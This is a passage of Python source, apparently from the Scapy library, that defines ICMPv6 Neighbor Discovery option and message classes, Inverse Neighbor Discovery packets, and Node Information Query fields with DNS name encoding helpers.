1770 9: "ICMPv6NDOptSrcAddrList", 

1771 10: "ICMPv6NDOptTgtAddrList", 

1772 # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py 

1773 # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py 

1774 # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py 

1775 # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py 

1776 # 15: Do Me, 

1777 # 16: Do Me, 

1778 17: "ICMPv6NDOptIPAddr", 

1779 18: "ICMPv6NDOptNewRtrPrefix", 

1780 19: "ICMPv6NDOptLLA", 

1781 # 18: Do Me, 

1782 # 19: Do Me, 

1783 # 20: Do Me, 

1784 # 21: Do Me, 

1785 # 22: Do Me, 

1786 23: "ICMPv6NDOptMAP", 

1787 24: "ICMPv6NDOptRouteInfo", 

1788 25: "ICMPv6NDOptRDNSS", 

1789 26: "ICMPv6NDOptEFA", 

1790 31: "ICMPv6NDOptDNSSL", 

1791 37: "ICMPv6NDOptCaptivePortal", 

1792 38: "ICMPv6NDOptPREF64", 

1793 } 

1794 

1795icmp6ndraprefs = {0: "Medium (default)", 

1796 1: "High", 

1797 2: "Reserved", 

1798 3: "Low"} # RFC 4191 

1799 

1800 

1801class _ICMPv6NDGuessPayload: 

1802 name = "Dummy ND class that implements guess_payload_class()" 

1803 

1804 def guess_payload_class(self, p): 

1805 if len(p) > 1: 

1806 return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown) 

1807 

1808 

1809# Beginning of ICMPv6 Neighbor Discovery Options. 

1810 

1811class ICMPv6NDOptDataField(StrLenField): 

1812 __slots__ = ["strip_zeros"] 

1813 

1814 def __init__(self, name, default, strip_zeros=False, **kwargs): 

1815 super().__init__(name, default, **kwargs) 

1816 self.strip_zeros = strip_zeros 

1817 

1818 def i2len(self, pkt, x): 

1819 return len(self.i2m(pkt, x)) 

1820 

1821 def i2m(self, pkt, x): 

1822 r = (len(x) + 2) % 8 

1823 if r: 

1824 x += b"\x00" * (8 - r) 

1825 return x 

1826 

1827 def m2i(self, pkt, x): 

1828 if self.strip_zeros: 

1829 x = x.rstrip(b"\x00") 

1830 return x 

1831 

1832 

1833class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): 

1834 name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" 

1835 fields_desc = [ByteField("type", 0), 

1836 FieldLenField("len", None, length_of="data", fmt="B", 

1837 adjust=lambda pkt, x: (2 + x) // 8), 

1838 ICMPv6NDOptDataField("data", "", strip_zeros=False, 

1839 length_from=lambda pkt: 

1840 8 * max(pkt.len, 1) - 2)] 

1841 

1842# NOTE: len includes type and len field. Expressed in unit of 8 bytes 

1843# TODO: Revoir le coup du ETHER_ANY 

1844 

1845 

1846class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet): 

1847 name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address" 

1848 fields_desc = [ByteField("type", 1), 

1849 ByteField("len", 1), 

1850 SourceMACField("lladdr")] 

1851 

1852 def mysummary(self): 

1853 return self.sprintf("%name% %lladdr%") 

1854 

1855 

1856class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr): 

1857 name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address" 

1858 type = 2 

1859 

1860 

1861class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet): 

1862 name = "ICMPv6 Neighbor Discovery Option - Prefix Information" 

1863 fields_desc = [ByteField("type", 3), 

1864 ByteField("len", 4), 

1865 ByteField("prefixlen", 64), 

1866 BitField("L", 1, 1), 

1867 BitField("A", 1, 1), 

1868 BitField("R", 0, 1), 

1869 BitField("res1", 0, 5), 

1870 XIntField("validlifetime", 0xffffffff), 

1871 XIntField("preferredlifetime", 0xffffffff), 

1872 XIntField("res2", 0x00000000), 

1873 IP6Field("prefix", "::")] 

1874 

1875 def mysummary(self): 

1876 return self.sprintf("%name% %prefix%/%prefixlen% " 

1877 "On-link %L% Autonomous Address %A% " 

1878 "Router Address %R%") 

1879 

1880# TODO: We should also limit the size of included packet to something 

1881# like (initiallen - 40 - 2) 

1882 

1883 

1884class TruncPktLenField(PacketLenField): 

1885 def i2m(self, pkt, x): 

1886 s = bytes(x) 

1887 tmp_len = len(s) 

1888 return s[:tmp_len - (tmp_len % 8)] 

1889 

1890 def i2len(self, pkt, i): 

1891 return len(self.i2m(pkt, i)) 

1892 

1893 

1894class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet): 

1895 name = "ICMPv6 Neighbor Discovery Option - Redirected Header" 

1896 fields_desc = [ByteField("type", 4), 

1897 FieldLenField("len", None, length_of="pkt", fmt="B", 

1898 adjust=lambda pkt, x: (x + 8) // 8), 

1899 MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)), 

1900 TruncPktLenField("pkt", b"", IPv6, 

1901 length_from=lambda pkt: 8 * pkt.len - 8)] 

1902 

1903# See which value should be used for default MTU instead of 1280 

1904 

1905 

1906class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet): 

1907 name = "ICMPv6 Neighbor Discovery Option - MTU" 

1908 fields_desc = [ByteField("type", 5), 

1909 ByteField("len", 1), 

1910 XShortField("res", 0), 

1911 IntField("mtu", 1280)] 

1912 

1913 def mysummary(self): 

1914 return self.sprintf("%name% %mtu%") 

1915 

1916 

1917class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491 

1918 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit" 

1919 fields_desc = [ByteField("type", 6), 

1920 ByteField("len", 1), 

1921 ByteField("shortcutlim", 40), # XXX 

1922 ByteField("res1", 0), 

1923 IntField("res2", 0)] 

1924 

1925 

1926class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet): 

1927 name = "ICMPv6 Neighbor Discovery - Interval Advertisement" 

1928 fields_desc = [ByteField("type", 7), 

1929 ByteField("len", 1), 

1930 ShortField("res", 0), 

1931 IntField("advint", 0)] 

1932 

1933 def mysummary(self): 

1934 return self.sprintf("%name% %advint% milliseconds") 

1935 

1936 

1937class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet): 

1938 name = "ICMPv6 Neighbor Discovery - Home Agent Information" 

1939 fields_desc = [ByteField("type", 8), 

1940 ByteField("len", 1), 

1941 ShortField("res", 0), 

1942 ShortField("pref", 0), 

1943 ShortField("lifetime", 1)] 

1944 

1945 def mysummary(self): 

1946 return self.sprintf("%name% %pref% %lifetime% seconds") 

1947 

1948# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support 

1949 

1950# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support 

1951 

1952 

1953class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068 

1954 name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)" 

1955 fields_desc = [ByteField("type", 17), 

1956 ByteField("len", 3), 

1957 ByteEnumField("optcode", 1, {1: "Old Care-Of Address", 

1958 2: "New Care-Of Address", 

1959 3: "NAR's IP address"}), 

1960 ByteField("plen", 64), 

1961 IntField("res", 0), 

1962 IP6Field("addr", "::")] 

1963 

1964 

1965class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068 

1966 name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)" # noqa: E501 

1967 fields_desc = [ByteField("type", 18), 

1968 ByteField("len", 3), 

1969 ByteField("optcode", 0), 

1970 ByteField("plen", 64), 

1971 IntField("res", 0), 

1972 IP6Field("prefix", "::")] 

1973 

1974 

1975_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 

1976 1: "LLA for the new AP", 

1977 2: "LLA of the MN", 

1978 3: "LLA of the NAR", 

1979 4: "LLA of the src of TrSolPr or PrRtAdv msg", 

1980 5: "AP identified by LLA belongs to current iface of router", # noqa: E501 

1981 6: "No preifx info available for AP identified by the LLA", # noqa: E501 

1982 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501 

1983 

1984 

1985class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068 

1986 name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)" # noqa: E501 

1987 fields_desc = [ByteField("type", 19), 

1988 ByteField("len", 1), 

1989 ByteEnumField("optcode", 0, _rfc4068_lla_optcode), 

1990 MACField("lla", ETHER_ANY)] # We only support ethernet 

1991 

1992 

1993class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140 

1994 name = "ICMPv6 Neighbor Discovery - MAP Option" 

1995 fields_desc = [ByteField("type", 23), 

1996 ByteField("len", 3), 

1997 BitField("dist", 1, 4), 

1998 BitField("pref", 15, 4), # highest availability 

1999 BitField("R", 1, 1), 

2000 BitField("res", 0, 7), 

2001 IntField("validlifetime", 0xffffffff), 

2002 IP6Field("addr", "::")] 

2003 

2004 

2005class _IP6PrefixField(IP6Field): 

2006 __slots__ = ["length_from"] 

2007 

2008 def __init__(self, name, default): 

2009 IP6Field.__init__(self, name, default) 

2010 self.length_from = lambda pkt: 8 * (pkt.len - 1) 

2011 

2012 def addfield(self, pkt, s, val): 

2013 return s + self.i2m(pkt, val) 

2014 

2015 def getfield(self, pkt, s): 

2016 tmp_len = self.length_from(pkt) 

2017 p = s[:tmp_len] 

2018 if tmp_len < 16: 

2019 p += b'\x00' * (16 - tmp_len) 

2020 return s[tmp_len:], self.m2i(pkt, p) 

2021 

2022 def i2len(self, pkt, x): 

2023 return len(self.i2m(pkt, x)) 

2024 

2025 def i2m(self, pkt, x): 

2026 tmp_len = pkt.len 

2027 

2028 if x is None: 

2029 x = "::" 

2030 if tmp_len is None: 

2031 tmp_len = 1 

2032 x = inet_pton(socket.AF_INET6, x) 

2033 

2034 if tmp_len is None: 

2035 return x 

2036 if tmp_len in [0, 1]: 

2037 return b"" 

2038 if tmp_len in [2, 3]: 

2039 return x[:8 * (tmp_len - 1)] 

2040 

2041 return x + b'\x00' * 8 * (tmp_len - 3) 

2042 

2043 

2044class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191 

2045 name = "ICMPv6 Neighbor Discovery Option - Route Information Option" 

2046 fields_desc = [ByteField("type", 24), 

2047 FieldLenField("len", None, length_of="prefix", fmt="B", 

2048 adjust=lambda pkt, x: x // 8 + 1), 

2049 ByteField("plen", None), 

2050 BitField("res1", 0, 3), 

2051 BitEnumField("prf", 0, 2, icmp6ndraprefs), 

2052 BitField("res2", 0, 3), 

2053 IntField("rtlifetime", 0xffffffff), 

2054 _IP6PrefixField("prefix", None)] 

2055 

2056 def mysummary(self): 

2057 return self.sprintf("%name% %prefix%/%plen% Preference %prf%") 

2058 

2059 

2060class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 

2061 name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option" 

2062 fields_desc = [ByteField("type", 25), 

2063 FieldLenField("len", None, count_of="dns", fmt="B", 

2064 adjust=lambda pkt, x: 2 * x + 1), 

2065 ShortField("res", None), 

2066 IntField("lifetime", 0xffffffff), 

2067 IP6ListField("dns", [], 

2068 length_from=lambda pkt: 8 * (pkt.len - 1))] 

2069 

2070 def mysummary(self): 

2071 return self.sprintf("%name% ") + ", ".join(self.dns) 

2072 

2073 

2074class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075) 

2075 name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option" 

2076 fields_desc = [ByteField("type", 26), 

2077 ByteField("len", 1), 

2078 BitField("res", 0, 48)] 

2079 

2080# As required in Sect 8. of RFC 3315, Domain Names must be encoded as 

2081# described in section 3.1 of RFC 1035 

2082# XXX Label should be at most 63 octets in length : we do not enforce it 

2083# Total length of domain should be 255 : we do not enforce it either 

2084 

2085 

2086class DomainNameListField(StrLenField): 

2087 __slots__ = ["padded"] 

2088 islist = 1 

2089 padded_unit = 8 

2090 

2091 def __init__(self, name, default, length_from=None, padded=False): # noqa: E501 

2092 self.padded = padded 

2093 StrLenField.__init__(self, name, default, length_from=length_from) 

2094 

2095 def i2len(self, pkt, x): 

2096 return len(self.i2m(pkt, x)) 

2097 

2098 def i2h(self, pkt, x): 

2099 if not x: 

2100 return [] 

2101 return x 

2102 

2103 def m2i(self, pkt, x): 

2104 x = plain_str(x) # Decode bytes to string 

2105 res = [] 

2106 while x: 

2107 # Get a name until \x00 is reached 

2108 cur = [] 

2109 while x and ord(x[0]) != 0: 

2110 tmp_len = ord(x[0]) 

2111 cur.append(x[1:tmp_len + 1]) 

2112 x = x[tmp_len + 1:] 

2113 if self.padded: 

2114 # Discard following \x00 in padded mode 

2115 if len(cur): 

2116 res.append(".".join(cur) + ".") 

2117 else: 

2118 # Store the current name 

2119 res.append(".".join(cur) + ".") 

2120 if x and ord(x[0]) == 0: 

2121 x = x[1:] 

2122 return res 

2123 

2124 def i2m(self, pkt, x): 

2125 def conditionalTrailingDot(z): 

2126 if z and orb(z[-1]) == 0: 

2127 return z 

2128 return z + b'\x00' 

2129 # Build the encode names 

2130 tmp = ([chb(len(z)) + z.encode("utf8") for z in y.split('.')] for y in x) # Also encode string to bytes # noqa: E501 

2131 ret_string = b"".join(conditionalTrailingDot(b"".join(x)) for x in tmp) 

2132 

2133 # In padded mode, add some \x00 bytes 

2134 if self.padded and not len(ret_string) % self.padded_unit == 0: 

2135 ret_string += b"\x00" * (self.padded_unit - len(ret_string) % self.padded_unit) # noqa: E501 

2136 

2137 return ret_string 

2138 

2139 

2140class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 

2141 name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option" 

2142 fields_desc = [ByteField("type", 31), 

2143 FieldLenField("len", None, length_of="searchlist", fmt="B", 

2144 adjust=lambda pkt, x: 1 + x // 8), 

2145 ShortField("res", None), 

2146 IntField("lifetime", 0xffffffff), 

2147 DomainNameListField("searchlist", [], 

2148 length_from=lambda pkt: 8 * pkt.len - 8, 

2149 padded=True) 

2150 ] 

2151 

2152 def mysummary(self): 

2153 return self.sprintf("%name% ") + ", ".join(self.searchlist) 

2154 

2155 

2156class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet): # RFC 8910 

2157 name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option" 

2158 fields_desc = [ByteField("type", 37), 

2159 FieldLenField("len", None, length_of="URI", fmt="B", 

2160 adjust=lambda pkt, x: (2 + x) // 8), 

2161 ICMPv6NDOptDataField("URI", "", strip_zeros=True, 

2162 length_from=lambda pkt: 

2163 8 * max(pkt.len, 1) - 2)] 

2164 

2165 def mysummary(self): 

2166 return self.sprintf("%name% %URI%") 

2167 

2168 

2169class _PREF64(IP6Field): 

2170 def addfield(self, pkt, s, val): 

2171 return s + self.i2m(pkt, val)[:12] 

2172 

2173 def getfield(self, pkt, s): 

2174 return s[12:], self.m2i(pkt, s[:12] + b"\x00" * 4) 

2175 

2176 

2177class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet): # RFC 8781 

2178 name = "ICMPv6 Neighbor Discovery Option - PREF64 Option" 

2179 fields_desc = [ByteField("type", 38), 

2180 ByteField("len", 2), 

2181 BitField("scaledlifetime", 0, 13), 

2182 BitEnumField("plc", 0, 3, 

2183 ["/96", "/64", "/56", "/48", "/40", "/32"]), 

2184 _PREF64("prefix", "::")] 

2185 

2186 def mysummary(self): 

2187 plc = self.sprintf("%plc%") if self.plc < 6 else f"[invalid PLC({self.plc})]" 

2188 return self.sprintf("%name% %prefix%") + plc 

2189 

2190# End of ICMPv6 Neighbor Discovery Options. 

2191 

2192 

2193class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6): 

2194 name = "ICMPv6 Neighbor Discovery - Router Solicitation" 

2195 fields_desc = [ByteEnumField("type", 133, icmp6types), 

2196 ByteField("code", 0), 

2197 XShortField("cksum", None), 

2198 IntField("res", 0)] 

2199 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}} 

2200 

2201 

2202class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6): 

2203 name = "ICMPv6 Neighbor Discovery - Router Advertisement" 

2204 fields_desc = [ByteEnumField("type", 134, icmp6types), 

2205 ByteField("code", 0), 

2206 XShortField("cksum", None), 

2207 ByteField("chlim", 0), 

2208 BitField("M", 0, 1), 

2209 BitField("O", 0, 1), 

2210 BitField("H", 0, 1), 

2211 BitEnumField("prf", 1, 2, icmp6ndraprefs), # RFC 4191 

2212 BitField("P", 0, 1), 

2213 BitField("res", 0, 2), 

2214 ShortField("routerlifetime", 1800), 

2215 IntField("reachabletime", 0), 

2216 IntField("retranstimer", 0)] 

2217 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2218 

2219 def answers(self, other): 

2220 return isinstance(other, ICMPv6ND_RS) 

2221 

2222 def mysummary(self): 

2223 return self.sprintf("%name% Lifetime %routerlifetime% " 

2224 "Hop Limit %chlim% Preference %prf% " 

2225 "Managed %M% Other %O% Home %H%") 

2226 

2227 

2228class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 

2229 name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation" 

2230 fields_desc = [ByteEnumField("type", 135, icmp6types), 

2231 ByteField("code", 0), 

2232 XShortField("cksum", None), 

2233 IntField("res", 0), 

2234 IP6Field("tgt", "::")] 

2235 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2236 

2237 def mysummary(self): 

2238 return self.sprintf("%name% (tgt: %tgt%)") 

2239 

2240 def hashret(self): 

2241 return bytes_encode(self.tgt) + self.payload.hashret() 

2242 

2243 

2244class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 

2245 name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement" 

2246 fields_desc = [ByteEnumField("type", 136, icmp6types), 

2247 ByteField("code", 0), 

2248 XShortField("cksum", None), 

2249 BitField("R", 1, 1), 

2250 BitField("S", 0, 1), 

2251 BitField("O", 1, 1), 

2252 XBitField("res", 0, 29), 

2253 IP6Field("tgt", "::")] 

2254 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2255 

2256 def mysummary(self): 

2257 return self.sprintf("%name% (tgt: %tgt%)") 

2258 

2259 def hashret(self): 

2260 return bytes_encode(self.tgt) + self.payload.hashret() 

2261 

2262 def answers(self, other): 

2263 return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt 

2264 

2265# associated possible options : target link-layer option, Redirected header 

2266 

2267 

2268class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet): 

2269 name = "ICMPv6 Neighbor Discovery - Redirect" 

2270 fields_desc = [ByteEnumField("type", 137, icmp6types), 

2271 ByteField("code", 0), 

2272 XShortField("cksum", None), 

2273 XIntField("res", 0), 

2274 IP6Field("tgt", "::"), 

2275 IP6Field("dst", "::")] 

2276 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2277 

2278 

2279# ICMPv6 Inverse Neighbor Discovery (RFC 3122) # 

2280 

2281class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet): 

2282 name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List" 

2283 fields_desc = [ByteField("type", 9), 

2284 FieldLenField("len", None, count_of="addrlist", fmt="B", 

2285 adjust=lambda pkt, x: 2 * x + 1), 

2286 StrFixedLenField("res", b"\x00" * 6, 6), 

2287 IP6ListField("addrlist", [], 

2288 length_from=lambda pkt: 8 * (pkt.len - 1))] 

2289 

2290 

2291class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList): 

2292 name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List" 

2293 type = 10 

2294 

2295 

2296# RFC3122 

2297# Options requises : source lladdr et target lladdr 

2298# Autres options valides : source address list, MTU 

2299# - Comme precise dans le document, il serait bien de prendre l'adresse L2 

2300# demandee dans l'option requise target lladdr et l'utiliser au niveau 

2301# de l'adresse destination ethernet si aucune adresse n'est precisee 

2302# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes 

2303# les options. 

2304# Ether() must use the target lladdr as destination 

2305class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6): 

2306 name = "ICMPv6 Inverse Neighbor Discovery Solicitation" 

2307 fields_desc = [ByteEnumField("type", 141, icmp6types), 

2308 ByteField("code", 0), 

2309 XShortField("cksum", None), 

2310 XIntField("reserved", 0)] 

2311 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2312 

2313# Options requises : target lladdr, target address list 

2314# Autres options valides : MTU 

2315 

2316 

2317class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6): 

2318 name = "ICMPv6 Inverse Neighbor Discovery Advertisement" 

2319 fields_desc = [ByteEnumField("type", 142, icmp6types), 

2320 ByteField("code", 0), 

2321 XShortField("cksum", None), 

2322 XIntField("reserved", 0)] 

2323 overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}} 

2324 

2325 

2326############################################################################### 

2327# ICMPv6 Node Information Queries (RFC 4620) 

2328############################################################################### 

2329 

2330# [ ] Add automatic destination address computation using computeNIGroupAddr 

2331# in IPv6 class (Scapy6 modification when integrated) if : 

2332# - it is not provided 

2333# - upper layer is ICMPv6NIQueryName() with a valid value 

2334# [ ] Try to be liberal in what we accept as internal values for _explicit_ 

2335# DNS elements provided by users. Any string should be considered 

2336# valid and kept like it has been provided. At the moment, i2repr() will 

2337# crash on many inputs 

2338# [ ] Do the documentation 

2339# [ ] Add regression tests 

2340# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501 

2341# [ ] Check if there are differences between different stacks. Among *BSD, 

2342# with others. 

2343# [ ] Deal with flags in a consistent way. 

2344# [ ] Implement compression in names2dnsrepr() and decompresiion in 

2345# dnsrepr2names(). Should be deactivable. 

2346 

2347icmp6_niqtypes = {0: "NOOP", 

2348 2: "Node Name", 

2349 3: "IPv6 Address", 

2350 4: "IPv4 Address"} 

2351 

2352 

2353class _ICMPv6NIHashret: 

2354 def hashret(self): 

2355 return bytes_encode(self.nonce) 

2356 

2357 

2358class _ICMPv6NIAnswers: 

2359 def answers(self, other): 

2360 return self.nonce == other.nonce 

2361 

2362# Buggy; always returns the same value during a session 

2363 

2364 

2365class NonceField(StrFixedLenField): 

2366 def __init__(self, name, default=None): 

2367 StrFixedLenField.__init__(self, name, default, 8) 

2368 if default is None: 

2369 self.default = self.randval() 

2370 

2371 

2372@conf.commands.register 

2373def computeNIGroupAddr(name): 

2374 """Compute the NI group Address. Can take a FQDN as input parameter""" 

2375 name = name.lower().split(".")[0] 

2376 record = chr(len(name)) + name 

2377 h = md5(record.encode("utf8")) 

2378 h = h.digest() 

2379 addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4]) 

2380 return addr 

2381 

2382 

2383# Here is the deal. First, that protocol is a piece of shit. Then, we 

2384# provide 4 classes for the different kinds of Requests (one for every 

2385# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same 

2386# data field class that is made to be smart by guessing the specific 

2387# type of value provided : 

2388# 

2389# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, 

2390# if not overridden by user 

2391# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, 

2392# if not overridden 

2393# - Name in the other cases: code is set to 0, if not overridden by user 

2394# 

2395# Internal storage, is not only the value, but the a pair providing 

2396# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@) 

2397# 

2398# Note : I merged getfield() and m2i(). m2i() should not be called 

2399# directly anyway. Same remark for addfield() and i2m() 

2400# 

2401# -- arno 

2402 

2403# "The type of information present in the Data field of a query is 

2404# declared by the ICMP Code, whereas the type of information in a 

2405# Reply is determined by the Qtype" 

2406 

2407def names2dnsrepr(x): 

2408 """ 

2409 Take as input a list of DNS names or a single DNS name 

2410 and encode it in DNS format (with possible compression) 

2411 If a string that is already a DNS name in DNS format 

2412 is passed, it is returned unmodified. Result is a string. 

2413 !!! At the moment, compression is not implemented !!! 

2414 """ 

2415 

2416 if isinstance(x, bytes): 

2417 if x and x[-1:] == b'\x00': # stupid heuristic 

2418 return x 

2419 x = [x] 

2420 

2421 res = [] 

2422 for n in x: 

2423 termin = b"\x00" 

2424 if n.count(b'.') == 0: # single-component gets one more 

2425 termin += b'\x00' 

2426 n = b"".join(chb(len(y)) + y for y in n.split(b'.')) + termin 

2427 res.append(n) 

2428 return b"".join(res) 

2429 

2430 

2431def dnsrepr2names(x): 

2432 """ 

2433 Take as input a DNS encoded string (possibly compressed) 

2434 and returns a list of DNS names contained in it. 

2435 If provided string is already in printable format 

2436 (does not end with a null character, a one element list 

2437 is returned). Result is a list. 

2438 """ 

2439 res = [] 

2440 cur = b"" 

2441 while x: 

2442 tmp_len = orb(x[0]) 

2443 x = x[1:] 

2444 if not tmp_len: 

2445 if cur and cur[-1:] == b'.': 

2446 cur = cur[:-1] 

2447 res.append(cur) 

2448 cur = b"" 

2449 if x and orb(x[0]) == 0: # single component 

2450 x = x[1:] 

2451 continue 

2452 if tmp_len & 0xc0: # XXX TODO : work on that -- arno 

2453 raise Exception("DNS message can't be compressed at this point!") 

2454 cur += x[:tmp_len] + b"." 

2455 x = x[tmp_len:] 

2456 return res 

2457 

2458 

2459class NIQueryDataField(StrField): 

2460 def __init__(self, name, default): 

2461 StrField.__init__(self, name, default) 

2462 

2463 def i2h(self, pkt, x): 

2464 if x is None: 

2465 return x 

2466 t, val = x 

2467 if t == 1: 

2468 val = dnsrepr2names(val)[0] 

2469 return val 

2470 

2471 def h2i(self, pkt, x): 

2472 if x is tuple and isinstance(x[0], int): 

2473 return x 

2474 

2475 # Try IPv6 

2476 try: 

2477 inet_pton(socket.AF_INET6, x.decode()) 

2478 return (0, x.decode()) 

2479 except Exception: 

2480 pass 

2481 # Try IPv4 

2482 try: 

2483 inet_pton(socket.AF_INET, x.decode()) 

2484 return (2, x.decode()) 

2485 except Exception: 

2486 pass 

2487 # Try DNS 

2488 if x is None: 

2489 x = b"" 

2490 x = names2dnsrepr(x) 

2491 return (1, x) 

2492 

2493 def i2repr(self, pkt, x): 

2494 t, val = x 

2495 if t == 1: # DNS Name 

2496 # we don't use dnsrepr2names() to deal with 

2497 # possible weird data extracted info 

2498 res = [] 

2499 while val: 

2500 tmp_len = orb(val[0]) 

2501 val = val[1:] 

2502 if tmp_len == 0: 

2503 break 

2504 res.append(plain_str(val[:tmp_len]) + ".") 

2505 val = val[tmp_len:] 

2506 tmp = "".join(res) 

2507 if tmp and tmp[-1] == '.': 

2508 tmp = tmp[:-1] 

2509 return tmp 

2510 return repr(val) 

2511 

2512 def getfield(self, pkt, s): 

2513 qtype = getattr(pkt, "qtype") 

2514 if qtype == 0: # NOOP 

2515 return s, (0, b"") 

2516 else: 

2517 code = getattr(pkt, "code") 

2518 if code == 0: # IPv6 Addr 

2519 return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16])) 

2520 elif code == 2: # IPv4 Addr 

2521 return s[4:], (2, inet_ntop(socket.AF_INET, s[:4])) 

2522 else: # Name or Unknown 

2523 return b"", (1, s) 

2524 

2525 def addfield(self, pkt, s, val): 

2526 if ((isinstance(val, tuple) and val[1] is None) or 

2527 val is None): 

2528 val = (1, b"") 

2529 t = val[0] 

2530 if t == 1: 

2531 return s + val[1] 

2532 elif t == 0: 

2533 return s + inet_pton(socket.AF_INET6, val[1]) 

2534 else: 

2535 return s + inet_pton(socket.AF_INET, val[1]) 

2536 

2537 

2538class NIQueryCodeField(ByteEnumField): 

2539 def i2m(self, pkt, x): 

2540 if x is None: 

2541 d = pkt.getfieldval("data") 

2542 if d is None: 

2543 return 1 

2544 elif d[0] == 0: # IPv6 address 

2545 return 0 

2546 elif d[0] == 1: # Name 

2547 return 1 

2548 elif d[0] == 2: # IPv4 address 

2549 return 2 

2550 else: 

2551 return 1 

2552 return x 

2553 

2554 

2555_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"} 

2556 

2557# _niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses", 

2558# 8: "Link-local addresses", 16: "Site-local addresses", 

2559# 32: "Global addresses" } 

2560 

2561# "This NI type has no defined flags and never has a Data Field". Used 

2562# to know if the destination is up and implements NI protocol. 

2563 

2564 

2565class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6): 

2566 name = "ICMPv6 Node Information Query - NOOP Query" 

2567 fields_desc = [ByteEnumField("type", 139, icmp6types), 

2568 NIQueryCodeField("code", None, _niquery_code), 

2569 XShortField("cksum", None), 

2570 ShortEnumField("qtype", 0, icmp6_niqtypes), 

2571 BitField("unused", 0, 10), 

2572 FlagsField("flags", 0, 6, "TACLSG"), 

2573 NonceField("nonce", None), 

2574 NIQueryDataField("data", None)] 

2575 

2576 

2577class ICMPv6NIQueryName(ICMPv6NIQueryNOOP): 

2578 name = "ICMPv6 Node Information Query - IPv6 Name Query" 

2579 qtype = 2 

2580 

2581# We ask for the IPv6 address of the peer 

2582 

2583 

2584class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP): 

2585 name = "ICMPv6 Node Information Query - IPv6 Address Query" 

2586 qtype = 3 

2587 flags = 0x3E 

2588 

2589 

2590class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP): 

